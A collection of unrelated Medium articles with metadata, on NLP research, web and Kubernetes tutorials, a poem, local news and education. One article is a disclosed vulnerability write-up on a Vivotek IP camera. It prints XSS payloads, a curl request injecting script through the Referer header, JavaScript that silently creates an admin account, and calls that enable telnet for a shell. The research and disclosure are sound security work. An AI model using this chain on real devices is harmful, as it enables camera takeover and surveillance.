Architecture
EWISE Architecture
The above architecture diagram has three main stages: attentive context encoding, definition encoding, and knowledge graph embedding.
Definition Encoding in EWISE takes a definition and leverages existing sentence representation models such as InferSent and USE to create a compressed representation of the definition. However, these baseline encodings are not sufficient to generalize to new words.
WordNet’s knowledge graph is used to train the encoder’s parameters. This graph contains nodes of senses and relations between these senses. The definitions are trained on sets of senses with up to 18 types of relations that connect them.
One of two approaches are used to calculate the scores between edges, TransE and ConvE, are delineated by the equations below:
Modified TransE equation to calculate dissimilarity between two sense embeddings in knowledge graph. q(*): sense embedding passed through definition encoder, h: head node knowledge graph, t: tail node of knowledge graph, e_l: link score to be learned
Modified ConvE equation to score the link between two sense embeddings in the knowledge graph. q(*): sense embedding passed through definition encoder, h: head node, t: tail node, e_l: link score to be learned, e_t: tail score to be learned, w: 2D convolution filters, W: linear transformation (i.e. fully connected layer), f: rectified linear unit (ReLU), vec: vectorized version, x_bar: 2D reshaping
Now that different senses are connected and their edges scored, these can be extended to create a larger and essentially continuous space of sense embeddings.
Notice how the above two stages have yet to involve the actual input sentences. This is what makes this approach so powerful. The sense embeddings are trained completely independently from the sentence inputs, so even arbitrary inputs will be able to be classified.
Attentive context encoding is where the input comes into play. This encoder generates context dependent representation for the input by leveraging a bidirectional LSTM. The words are represented as a concatenation of the forward and backward versions of the sentence. For example:
Input sentence: he wore a tie Backward: tie a wore he BiLSTM representation: [he, tie] ; [wore,a] ; [a,wore] ; [tie, he]
This representation is followed by a self-attention layer, detailed more in Vaswani et al (2017), and a fully connected layer to project into the space of sense embeddings.
During training, this representation is multiplied by each sense embedding of in the inventory and the one with the highest score is chosen as the label. Because this is a supervised setting, we can use average cross entropy loss to tune the model to pick correct mapping.
Softmax layer following fully connected layer to calculate sense embedding probabilities. v_i: sense embedding of a given input word; b: bias; S: sense inventory
Cross entropy loss function minimized over all annotated words in a batch. z_ij: one hot representation of the target (i.e. correct) sense in inventory S
Results
The model is evaluated on how it compares to other state of the art methods as well as its power to generalize to rare and unseen words.
Comparison of overall and part of speech wise F1 scores of EWISE across different test datasets with other state of the art models
EWISE beats all other models across all categories and across all part of speech tags except for adverbs where its F1 score falls just short of GAS.
Comparison of F1 scores of different models based on frequency of annotated words in the train set
The left most category with frequency=0 represents the zero-shot learning capability of EWISE. In other words, for words it has never seen before it can get an F1 score of 91, significantly higher than its counterparts. It also performs the best in all frequency buckets as well for rare words. This proves the model’s capacity to classify the word sense of unseen words.
Conclusion
In summary, EWISE is a new approach to the WSD problem that leverages independent training of word sense embeddings and inputs to extend its usability to unseen and rare words. EWISE consistently outperforms all other state of the art WSD models and proves that the model has zero-shot learning capabilities.
|
https://medium.com/analytics-vidhya/ewise-a-new-approach-to-word-sense-disambiguation-c57c5dfa3a87
|
['Kaushik Mahorker']
|
2020-05-05 17:46:32.902000+00:00
|
['NLP', 'Neural Networks', 'Machine Learning', 'Research']
|
Firebase Storage + Angular 10: File Upload/Display/Delete example
|
In this tutorial, I will show you how to make File Upload/Display/Delete with Firebase Storage and Angular 10 with the help of @angular/fire . Files' info will be stored in Firebase Realtime Database.
Firebase Storage + Angular 10 example Overview
We’re gonna build an Angular 10 App that helps us:
upload file to Firebase Storage
see the progress bar with percentage
save file metadata (name, url) to Firebase Realtime Database
display list of files
delete any file in the list
The result in Firebase Cloud Storage:
And Realtime Database:
Following image shows the data flow with Angular Client, Firebase Cloud Storage & Firebase Realtime Database:
- File upload:
store a file to Firebase Cloud Storage
retrieve metadata (name, url) of the file from Firebase Cloud Storage
save metadata (name, url) to Firebase Realtime Database
Display/get/delete files: use the file metadata (name, url) which is stored in Realtime Database as reference to interact with Firebase Storage.
For more details, please visit:
https://bezkoder.com/firebase-storage-angular-10-file-upload/
Further Reading
You can find how to make CRUD operations with Realtime DB or Firestore in the posts:
Or create Angular HTTP Client for working with Restful API in:
Angular 10 CRUD Application example with Web API
Source Code
You can find the complete source code for this tutorial on Github.
|
https://medium.com/@bezkoder/firebase-storage-angular-10-file-upload-4b69289a4151
|
[]
|
2020-12-10 12:53:18.132000+00:00
|
['File Upload', 'Angular', 'Angular 10', 'Firebase Storage', 'Firebase']
|
Something About Why a Robin Sings
|
Turn it once, turn it twice
the lamp won’t light unless you’re patient with it
A calm marigold hue,
I think the extra money spent on those
bulbs made my bedroom walls breathe a sigh of relief
Sometimes, though,
their off-white skin reminds me of when I knew you
Waking up early in the morning, I let the chilly air find a home in my bed.
Freezing my fingertips.
I romanticize the little things -
A lamp, sleeping with the windows open,
cold cold hands.
I remember when I was so good I was over romanticized to the point where you didn’t even recognize me anymore.
I wonder if you are still capable of loving someone to the point where
the red spoons in your utensil drawer turn happily to silver
as if they’d found themselves for the first time
There’s time that I cannot account for — my
brain can’t handle recalling even the good memories sometimes.
Though I want to remember,
I am whole,
I am whole,
I am whole even without them.
After all, it is not the weather that makes a robin sing,
it’s their sarynx.
I am afraid I will not love anyone again -
but there is a note I tacked to my bed frame that
tells me to leave those robins singing for all the right reasons.
|
https://medium.com/@cassidybishop27/something-about-why-a-robin-sings-522ef35d21bd
|
['Cassidy Bishop']
|
2020-12-25 01:21:47.880000+00:00
|
['Poetry', 'Poet', 'Happy', 'Poem', 'Experimental']
|
Buckinghamshire Council Website: Weeknote #15
|
w/c 3rd February
This week we:
Held our seventh show and tell. We covered work being done on the evolving home page design, Libraries service pages and our new “find and apply for a job” service. We also had a guest appearance from Tom Dyson at Torchbox who demo’d the work they’ve been doing recently to make their CMS, Wagtail, and the sites built on it more accessible.
Shared our digital design guidelines with the various third party providers of Buckinghamshire websites. We’re using Zero Height for this which is proving to be pretty neat.
Did some A/B testing of our new homepage design with our user testing panel. We’re trying to make it less cluttered as some earlier feedback told us it was a bit overwhelming. We previously tried hiding some of it under a “show more” button, but then found that users often missed the button, so our new design makes it more obvious. In testing, we found that although more people tended to use the search box when the button was present it didn’t have any impact on how well organised they found the homepage.
Continued rewriting Libraries service content. This should be published in the next sprint and will represent the first service we’ve rewritten content for. We’re only aiming for MVP levels of completion at this point as we need to migrate all services before we can start digging into things in more depth, but the work done on Libraries will help us shape the process we use for further services.
An image comparing the existing and new content for renewing a library loan, that shows the reduction in text
Pulled together the work done on “find and apply for a job” into a first pass, it’s still very much a work in progress (e.g. you can apply filtering to the jobs lists by manipulating the URL but there’s no UI element for it yet), but it does indeed resemble a jobs site.
What we’re thinking about:
How to display long form content like policies, the constitution in an accessible way. The new council comes into being in about 50 days so we’re getting to the sharp end of getting all of our statutory info up. Unfortunately this is typically presented as 30 page long .pdf’s, but Brighton have done a great job of showing a better way of doing things that we can learn from.
Next week:
|
https://medium.com/buckinghamshire-digital-service/buckinghamshire-council-website-9ce880cb6943
|
['Tom Harrison']
|
2020-02-14 16:15:04.038000+00:00
|
['Fixtheplumbing', 'Local Government', 'Localgovdigital', 'Buckinghamshire']
|
Vivotek IP Camera Vulnerabilities Discovered and Exploited
|
Vivotek IP Camera Vulnerabilities Discovered and Exploited
As a personal project, I took it upon myself to research and discover vulnerabilities within various embedded devices, such as a Network Attached Storage (NAS), IP camera, and router. In this blog, I will be going over how I found DOM-based XSS, Persistent XSS, a hidden CGI endpoint to enable services, and how we can use these vulnerabilities to acquire a remote shell on the Vivotek FD8369A-V camera, firmware version 0206b.
Initial Reconnaissance
It is important to realize that the growing amount of services and features in embedded devices has also increased the attack surface available to remote adversaries. Keeping this in mind, let’s gather some information about the camera by using Nmap to enumerate open ports and services running on the FD8369A-V.
PORT STATE SERVICE VERSION
80/tcp open http Boa httpd
443/tcp open ssl/http Boa httpd
554/tcp open rtsp Vivotek FD8134V webcam rtspd
8080/tcp open http Boa httpd
From the resulting information, we can see that the FD8369A-V appears to be hosting a web application interface on a Boa web server, as well as a real-time streaming protocol service for viewing a live video feed from the camera. Nothing out of the ordinary…
Let’s get started by taking a look at the web application and searching for web-based vulnerabilities that can be leveraged to gain access or potentially compromise this device.
Finding DOM-based XSS (CVE-2018–18005)
After successfully authenticating to the camera’s web interface, we are presented with a live video feed from the camera, as well as various configuration settings and navigation options to choose from. Let’s proceed to map the application’s various endpoints while taking note of any potential entry points for injection, such as URL query strings or any client-controlled parameter fields.
One of the endpoints I discovered allowed a user to view the contents of an XML document that was uploaded as an event script as shown below.
https://10.42.4.117/setup/event/event_script.html?index=0
I was curious as to how the index query string parameter was being handled and decided to debug the client-side JavaScript code.
From the snippet above on line 55, we can see that the application is taking a query string parameter, in this case index , and using it within the context of JavaScript’s eval() function. Knowing this, we can supply the following URL to trigger a DOM-based cross-site scripting vulnerability in the context of a victim’s browser through the camera’s web interface.
https://10.42.4.117/setup/event/event_script.html?alert(document.domain)
Clicking the link mentioned above will result in the following.
With that, we now have DOM-based XSS that is triggered when an authenticated user clicks on a maliciously crafted URL containing our payload.
While this is a valid attack vector, it requires more investment as an attacker than we’d like. Since our goal should be to minimize the amount of victim involvement, let’s dig a little deeper and continue our search for vulnerabilities.
Finding Persistent XSS (CVE-2018–18244)
During the process of mapping the camera’s various endpoints and functionality, I discovered that the application supplied verbose log information pertaining to the various backend services and miscellaneous error messages.
Since verbose logging can assist in discovering unexpected application or service behavior, I made sure to keep an eye on it while performing my authorization and additional injection tests. Because of this, I was able to observe that the camera’s logging service also included information regarding unauthorized attempts to access the application’s CGI endpoints. In addition to these “unauthorized access” log messages, the HTTP Referer header from the originating request was being included as well.
Due to the fact that the Referer header is a client-controlled value that can easily be modified using an HTTP intercepting proxy, such as Burp Suite, or a command line utility, such as cURL , an attacker can issue the following cURL request to trigger an “unauthorized access” log message containing a cross-site scripting payload.
curl -i -s -k -X $'GET' \ -H $'Host: 10.42.4.112' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://test.com/test.html?<script>alert(\'XSS TEST\')</script>' -H $'Connection: close' \ $'http://10.42.4.112/cgi-bin/privilege.cgi'
Issuing the request above will result in the following response, just as we expect.
HTTP/1.1 403 Forbidden
Date: Fri, 05 Oct 2018 20:26:39 GMT
Server: Web Server
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=ISO-8859-1 <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD>
<BODY><H1>403 Forbidden</H1>
Your client does not have permission to get URL /cgi-bin/privilege.cgi from this server.
</BODY></HTML>
Now, when an unsuspecting user visits the camera’s web interface and views the /setup/system/syslog.html endpoint, arbitrary JavaScript will be executed in the context of the user’s browser.
After allowing the page to continue execution, we see the Referer header embedded in the logs.
Enabling Hidden Services (CVE-2018–18004)
Ideally, to expedite the search for vulnerabilities in embedded devices, such as the camera, we would enable an SSH service to connect to the device and pull files, such as the camera’s web root directory for static analysis. However, since there is no way to enable such functionality through the camera’s web application interface, we’ll have to refer to the manufacturer’s website for the firmware, which we can obtain here. If Vivotek, Inc. did not publicly provide firmware, we could resort to obtaining a physical shell through the device’s debugging ports. However, since this is not the case we can proceed to download the firmware file from the manufacturer’s website.
Upon downloading the firmware file, I used binwalk, a command line tool used for searching firmware images for embedded files and code, to extract the file system currently in use by the camera.
binwalk -e FD8369A-V-VVTK-0206b.flash.pkg
...
mkdir Demo
...
tar -xvf _FD8369A-V-VVTK-0206b.flash.pkg.extracted/31 -C Demo/
...
binwalk -e Demo/rootfs.img
...
After extracting the camera’s file system from the rootfs.img file, I began to look through the various CGI files and came across one that appeared to allow users to enable or disable various services.
Contents of /cgi-bin/admin/mod_inetd.cgi
#!/bin/sh
strparam=`echo $QUERY_STRING | sed 's/=/ /g'`
/usr/bin/mod_inetd_conf $strparam
echo -ne "Content-type:text/plain\r
"
echo -ne "Content-length:2\r
"
echo -ne"\r
" # end of HTTP header
echo OK
…and the contents of /usr/bin/mod_inetd_conf
#!/bin/sh
#
# Note: This script will turn on/off the listend port of inetd
# If there is no arguments, it will list the /etc/inetd.conf
# example:
# mod_inetd_conf telnet on — turn on the telnetd
# mod_inetd_conf telnet off — turn off the telnetd INETD_CONF="/etc/inetd.conf"
SERVICES="/etc/services"
REAL_INETD_CONF=`realpath $INETD_CONF`
REAL_SERVICES=`realpath $SERVICES`
IS_CHANGED=0 temp_var=`echo $2 | grep 'on'`
if [ -n "$temp_var" ]; then
sed -i -e "s/^#\($1[[:blank:]].*\)$/\1/" $REAL_INETD_CONF
IS_CHANGED=1
fi temp_var=`echo $2 | grep 'off'`
if [ -n "$temp_var" ]; then
sed -i -e "s/^\($1[[:blank:]].*\)$/#\1/" $REAL_INETD_CONF
IS_CHANGED=1
fi if [ $# -ge 3 ]; then
echo "Change service $1 port to $3"
sed -i -e "/^$1[[:blank:]]/{s/[0–9][0–9]*/$3/}" $REAL_SERVICES
IS_CHANGED=1
fi if [ $IS_CHANGED -eq 1 ]; then
/etc/init.d/inetd reload
fi
cat $INETD_CONF
From the two files listed above, we can determine that the hidden mod_inetd.cgi endpoint is responsible for enabling various services, specified through a URL query string parameter.
Using this information, let’s enable the telnet service by cURLing the following request so that we can acquire a shell on the device.
-H $'Host: 10.42.4.117' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Referer: 10.42.4.117' -H $'Authorization: Basic cm9vdDpUZXN0MTIzIQ==' \
--data-binary $'\x0d\x0a' \
$' curl -i -s -k -X $'GET' \-H $'Host: 10.42.4.117' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Referer: 10.42.4.117' -H $'Authorization: Basic cm9vdDpUZXN0MTIzIQ==' \--data-binary $'\x0d\x0a' \$' http://10.42.4.117/cgi-bin/admin/mod_inetd.cgi?telnet=on'
If we cURL the request above, we should see the following.
HTTP/1.1 200 OK
Date: Tue, 23 Oct 2018 00:29:32 GMT
Server: Web Server
Accept-Ranges: bytes
Connection: close
Reloading configuration inetd: .
telnet stream tcp nowait root /usr/sbin/telnetd telnetd -i
Content-type:text/plain
Content-length:2 OK
With that, we now have a telnet service listening on the Vivotek FD8369A-V camera.
Tying it All Together
Although we can enable the Telnet service, doing so requires us to be authenticated. However, if we take advantage of the camera’s various weaknesses, and the fact that the FD8369A-V is vulnerable to persistent XSS, we can store a JavaScript payload that will force the victim’s browser to reach out to an attacker controlled server, embed the contents of a malicious JavaScript file, and create an administrative user on the camera.
If attackers are able to create an administrative account, they could view the live video feed of the camera, modify configuration settings, or enable the Telnet service and obtain a shell on the device.
Let’s proceed to list out the steps an attacker could follow to fully compromise the FD8369A-V.
Step 1. Identify and gain access to communicate with the camera on a public or local network.
Identify and gain access to communicate with the camera on a public or local network. Step 2. Host the following JavaScript file on an attacker controlled server that will cause the victim’s browser to issue a request to the endpoint responsible for creating a new user.
var x = new XMLHttpRequest();
x.open("POST", "/cgi-bin/admin/editaccount.cgi", true);
x.send("index=21&tempname=xssUser&userpass=Test123%21&confirm=Test123%21&privilege=admin&username=xssUser&method=add&return=%2F");
Step 3. cURL the following request, containing JavaScript in the Referer header, to the target device.
Step 4. Use social engineering to convince the victim to visit the camera’s vulnerable endpoint ( setup/system/syslog.html ) containing our malicious payload.
Victim’s client issuing request to retrieve malicious JavaScript source file.
Victim’s client issuing XHR request to create administrative user.
Step 5. When the script has been requested from the attacker controlled server, visit the FD8369A-V’s web interface and log in using the newly created administrative account.
When the script has been requested from the attacker controlled server, visit the FD8369A-V’s web interface and log in using the newly created administrative account. Step 6. cURL the following request to enable the Telnet service, this time using our newly obtained account credentials.
-H $'Host: 10.42.4.117' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Referer: 10.42.4.117' -H $'Authorization: Basic eHNzVXNlcjpUZXN0MTIzIQ==' \
— data-binary $'\x0d\x0a' \
$' curl -i -s -k -X $'GET' \-H $'Host: 10.42.4.117' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Referer: 10.42.4.117' -H $'Authorization: Basic eHNzVXNlcjpUZXN0MTIzIQ==' \— data-binary $'\x0d\x0a' \$' http://10.42.4.117/cgi-bin/admin/mod_inetd.cgi?telnet=on'
Step 7. Telnet into the device using our account credentials.
But wait, there is a problem. As it turns out, when a new user is created on the FD8369A-V, the default shell associated with that user is /bin/bash . However, the only shell that the camera supports is /bin/sh . The default root user’s account is the only one with the correct shell enabled. Since the camera does not require knowledge of users’ old passwords when changing them, an attacker can wait for an appropriate time (while not in use) to change the root user’s account password through the web interface, telnet into the device, and change the shell associated with the attacker’s account.
To prevent the victim from being permanently locked out of the camera and performing a hard-reset, an attacker can proceed to modify the camera’s backend to prompt the victim to change their password or convince them that their password has been changed due to a system update.
Conclusion
In this post, we showed how a remote attacker can potentially compromise the FD8369A-V by using a chain of vulnerabilities found within the camera. Given the ability to communicate with the camera over a network, an attacker can potentially target all of Vivotek, Inc.’s cameras running firmware version 0206b.
Responsible Disclosure Timeline
Initial Contact: October 2, 2018
Vulnerabilities disclosed: October 2, 2018
Vendor response: October 3, 2018
|
https://blog.securityevaluators.com/vivotek-ip-camera-vulnerabilities-discovered-and-exploited-2e2531ecd244
|
['Paul Yun']
|
2019-01-02 16:58:39.358000+00:00
|
['Security Camera', 'Ise Labs', 'IoT', 'Hacking', 'Privacy']
|
PitchTeen: Why student entrepreneurs should be encouraged?
|
We all have joked about not working 9-to-5 or starting your own business over a cup of ramen with your roommates while typing the 5000th line of our assignment that has a deadline in the next 4 hours. But, we never gave it a shot, right?
Studentpreneurs have always intrigued me. Imagine being working and paying off all your bills at such a young age — we all love that life even though, it comes with a lot of hard work. Not just that, studentpreneurs do have advantages:
The obvious one — young age: Studentpreneurs are young, probably halfway into college or high school. They have a lot of enthusiasm and time ahead of them. If things go south, they can afford to make a mistake right now and they don’t, then win-win for everyone. You gain experience: While running a business, you don’t only learn how to pitch and lead teams. But at the same moment, you inculcate skills like communication, taking criticism, and using it in a constructive positive way. You learn why things are the way there are. You network with people: You walk into a room, full of people you don’t know to pitch your idea (might have stalked them on LinkedIn). You talk, you pitch and you talk again. Even without knowing, you are networking with people — in the same industry.
So, give it a try and know, failing is okay.
— Anjali Chaturvedi, Pitchteen
|
https://medium.com/@anjaliichaturvedi/pitchteen-why-student-entrepreneurs-should-be-encouraged-981faa68e89a
|
['Anjali Chaturvedi']
|
2020-12-08 17:45:44.134000+00:00
|
['Tech', 'High School', 'Business', 'STEM', 'Girls In Tech']
|
How many of us are struggling to get this synthesis in place?
|
How many of us are struggling to get this synthesis in place? The only hope for this country is to break free of the 20th century entanglements but that will not be allowed. The oligarchy is a parasite that feeds on us but they are weak. First they had to destroy hope and then destroy faith in our ability to rule ourselves. That allowed them to gain control and then destroy our electoral process while denouncing all social change. Controlled poverty will do the rest. The media has been turned into a propaganda machine and only a grossly distorted charade remains of the rest of the planet for those who are told to trust nothing else.
It will take more than the farce of our complicit, corrupt political parties and another sham election to change this. A clear majority sees the future but we are powerless to change. How can this be?
|
https://medium.com/theotherleft/how-many-of-us-are-struggling-to-get-this-synthesis-in-place-75482c98dda9
|
['Mike Meyer']
|
2018-03-11 23:06:50.418000+00:00
|
['Politics', 'Innovation', 'America', 'Diversity', 'Journalism']
|
British Pathé releases 85,000 films on YouTube
|
Newsreel archive British Pathé has uploaded its entire collection of 85,000 historic films, in high resolution, to its YouTube channel. This unprecedented release of vintage news reports and cinemagazines is part of a drive to make the archive more accessible to viewers all over the world. “Our hope is that everyone, everywhere who has a computer will see these films and enjoy them,” says Alastair White, General Manager of British Pathé. “This archive is a treasure trove unrivalled in historical and cultural significance that should never be forgotten. Uploading the films to YouTube seemed like the best way to make sure of that.”
The above is fantastic news for sites like ours and the Woking Muslim Mission website as we can finally watch and share, at no cost, stunning videos from when the Lahore Ahmadiyya Movement ran the Woking Mosque in the UK.
Further videos can be seen here.
Original Source: British Pathe
|
https://medium.com/virtual-mosque/british-path%C3%A9-releases-85-000-films-on-youtube-5f0c9ceb878e
|
['Virtual Mosque']
|
2016-04-09 17:56:23.440000+00:00
|
['Ahmadiyya', 'Lahore', 'British']
|
Coding Should be Taught in Schools as a Unique Subject. Here’s Why.
|
Coding Should be Taught in Schools as a Unique Subject. Here’s Why. Seantarzy Follow Dec 18 · 3 min read
Computer science is an undeniable, omnipresent part of our lives, and there is no sign of it going away anytime soon. With such great demand for software engineers and data scientists, many schools see it fit to teach computer programming, even as early as elementary school. Schools that have implemented such programs are ahead of the curve and are appropriately shaping the next generation. However, there is one issue with regard to the manner in which schools are implementing technology education. Some schools are teaching computer programming within the framework of math classes, or even teaching it as a language. The problem is that coding falls under neither of these categories, and it should be treated as its own unique discipline.
Only a few days ago, neuroscientists at MIT published findings on the effects that computer programming has on the brain. They attempted to address a common coding conundrum: is it a kind of math? A language? Both?
In the course of their research, the neuroscientists found that reasoning through computer code activates a totally different region of the brain than the one activated by language-learning. Coding activates the “multiple demand network”, which is reserved for complex cognitive functions, such as math problems.
So now you may be thinking: “Oh ok, so it is a form of mathematics.” Well, while math also activates the multiple demands network, math and computer programming activate different parts of the multiple demands network. So, coding does not exactly cognitively translate to math. A brilliant mathematician will not necessarily be a proficient coder, and vice versa.
The implications of such unique brain activity is rather exciting. We now have the chance to evolve our brains. While math and reading have been pillars of traditional education for thousands of years, computer programming is a new human activity. Therefore, exercising the “coding muscles” of the brain can bring us new ways of thinking to advance society. Senior author of the paper Evelina Fedorenko states, “It’s possible that if you take people who are professional programmers, who have spent 30 or 40 years coding in a particular language, you may start seeing some specialization, or some crystallization of parts of the multiple demand system.”
Even with this finding, the researchers still ask the question, “Does computer programming fall under the category of math or language?” Sometimes the best way to answer a question is to remove the parameters presented. It’s neither. Not only is that a solid answer to the proposed question, but it also can have very progressive ramifications for generations to come. The world is full of problems. Let’s give the young generation the opportunity approach these problems with a fresh mindset by creating a new, exciting school subject. A subject that is not only sure to increase in relevance, but, because of its uniqueness, is likely to augment student minds and challenge traditional thought.
Sources:
|
https://medium.com/swlh/coding-should-be-taught-as-in-schools-as-a-unique-subject-heres-why-bf242803cb2e
|
[]
|
2020-12-19 09:57:39.136000+00:00
|
['Technology', 'Education', 'Programming', 'MIT']
|
Medford looking for nonprofit involvement in Clean Communities Grant Program
|
With the return of the spring season, Medford Township is looking for non-profit organizations to help clean up township properties through its Clean Communities Grant Program.
Headed by Judy Scherf, the township’s recycling coordinator, the grant program gives money to non-profits in return for volunteering to clean up the township’s parks, streets and other properties. The grant money also pays for cleaning supplies and equipment.
“The funding comes from the state to the township,” Scherf said. “It’s for cleaning the town. I have non-profit adult groups, and I have Boy and Girl Scout groups as well.”
The state’s Clean Communities funding can only be applied toward cleaning township properties. The township’s Neighborhood Services Advisory Committee identifies a number of cleaning projects varying from parks to streets and assigns them to different non-profits.
“We usually do the parks, like Bob Meyer Park, Freedom Park, Bende Park,” Scherf said. “That’s what the Boy and Girl Scout groups usually do. I recently had Jones Road done and Gravely Road done. Our adult groups go out on the roads.”
To receive the money from the state, the township files a report detailing the projects and the organizations working on them. Scherf said the funding varies from year-to-year depending on the number and scope of the projects.
“(The state) takes that grant and looks at how much work we did, what we worked on and how many supplies I bought,” Scherf said. “Some years, we haven’t been able to do a lot, and there are others years where we’ve had a lot going on.”
Even though the grant money is only awarded for cleaning projects, the program has had a residual effect on the community. Scherf said many of the participating non-profits return to their project sites for further beautification and restoration on their own time.
“We give them a donation from the program,” she said. “Afterward, they can do what they want with beautifying it.”
One such example in recent years was a cleaning project at the municipal building on Main Street. Following the Clean Communities project, groups returned to plant flowers and further beautify the property.
Another positive of the program has been its facilitation of a community service attitude among youth organizations.
“The kids are learning so much from it,” she said.
The Clean Communities program is something the township is pushing as the weather warms up and residents partake in more outdoor activities.
Councilman Randy Pace took a few minutes to inform the public about it at last week’s council meeting in hopes to get more organizations involved this year.
“Right now, we have about 10 to 12 non-profits involved,” he said.
Scherf said the township is open to inviting new non-profits to get involved with the program. She emphasized businesses are not permitted to participate.
For more information on Clean Communities or to get involved, contact Scherf at (609) 654–6791 ext. 322 or email [email protected].
|
https://medium.com/the-medford-sun/medford-looking-for-nonprofit-involvement-in-clean-communities-grant-program-26300b64d884
|
[]
|
2016-12-19 15:34:38.693000+00:00
|
['Families', 'Headlines', 'Cleaning', 'Medford', 'Nonprofits']
|
caring for plants
|
i just actually can not care for my house plants guys. I swear i try really hard to keep them alive but they just keep dying. chinese money plant? dead. my succulents? dead. the rest of my plants? really very droopy and on the brink of death. idk if anyone has any tips maybe that would work. OR maybe i should look up what the easiest plants to take care of are. yea. probably succulents (which died) but maybe if i buy more they wont die this time.
|
https://medium.com/@hannahokay/caring-for-plants-396200ea9466
|
[]
|
2020-12-18 05:43:17.352000+00:00
|
['Plants', 'Clairo', 'Teens', 'Houseplants']
|
Zero to Kubernetes in 5 Mins
|
K8s in practice
Now that we have a good understanding of what Kubernetes is, let’s see it in practice.
In this tutorial, we will:
Create a simple http server with golang
Deploy a k8s cluster, we will use K3s (a lightweight Kubernetes distribution)
Deploy our golang server on top of K8s
Expose our server to the outer world to be able to access it over the internet.
Prerequisites:
Linux based machine (Ubuntu or Centos)- For Windows you can use MiniKube or Kind instead of K3s and almost everything else should remain the same.
Docker
Golang (this tutorial assumes version 1.15.3 but older versions should work as well)
A docker registry account (you can create an account for free on dockerhub)
Now let’s get our hands dirty!
Install golang following the steps mentioned here. Then create a folder in any location of your choice. In this tutorial I will be using the following path as the root folder to my project /root/tutorial/ Create a simple http go server. Use the following file and save it in /root/tutorial under any name. I will refer to it as server.go
3. Make sure everything is setup correctly and the files runs correctly by running the following command $ go run server.go You should be able to see “Starting server at port 8080”
4. Next step is to build our go project into an executable. Run the following command at the root directory of the project(where server.go occurs)
$ GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build . You should be able to see a newly created file with no extension.
5. To complete the next steps we’ll need to create a dockerhub account. You can signup on it for free. We will need an account on dockerhub on any registry to push the docker image that we will create.
6. Then we need to containerize our server to run it inside a container. First we will need to install docker. After installing docker successfully, we can then build a docker image for our server. To do that, copy the following gist into a file named Dockerfile inside /root/tutorial
Afterwards run the following command
$ docker build . -t <dockerhub-username>/tutorial where you should replace <dockerhub-username> with your username on dockerhub.
7. Login using docker cli command $ docker login -u <dockerhub-username> Then push the created image to dockerhub $ docker push <dockerhub-username>/tutorial
8. Now that our docker image is ready, we can use K8s to deploy and manage for us container(s) from that image. To do that, let’s install K3s first. I am using K3s for this tutorial as I find it a great reliable and lightweight distribution for K8s, perfect for development and edge (environments with limited resources) deployments. To install it you just need to run $ curl -sfL https://get.k3s.io | sh - That’s it! That is all what you need to do in order to have a functional Kubernetes cluster.
9. Next we want to create a k8s deployment file for our image. Copy and paste the following yaml deployment file on your machine.
10. Now we want to instruct k8s to create that deployment for us. To do that we need to run $ kubectl create -f tutorial-deployment.yaml To validate the deployment was created successfully, we should run $ kubectl get pods and we should be able to see something similar to
NAME READY STATUS RESTARTS AGE
go-server-deployment-xxxx 1/1 Running 0 65m
11. We are almost there, we have everything set by now and K8s is currently managing our container for us. The only missing step is to expose our pod to the outer world in order to be able to access it over the internet. To achieve that we just need to run the following command
$ kubectl expose deployment go-server-deployment --type=NodePort
This command will expose our deployment to the outer world on a random port. To identify that random port, we need to run $ kubectl get svc we should be able to see a service that got created for us
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP x.x.x.x <none> 443/TCP 87m
go-xxx NodePort x.x.x.x <none> 8080:31628/TCP 37m
|
https://medium.com/swlh/zero-to-kubernetes-in-5-mins-dcff81b4508
|
['Ahmed Nader']
|
2020-10-27 06:17:42.173000+00:00
|
['Golang', 'Cloud Native', 'Kubernetes', 'Tutorial', 'Docker']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.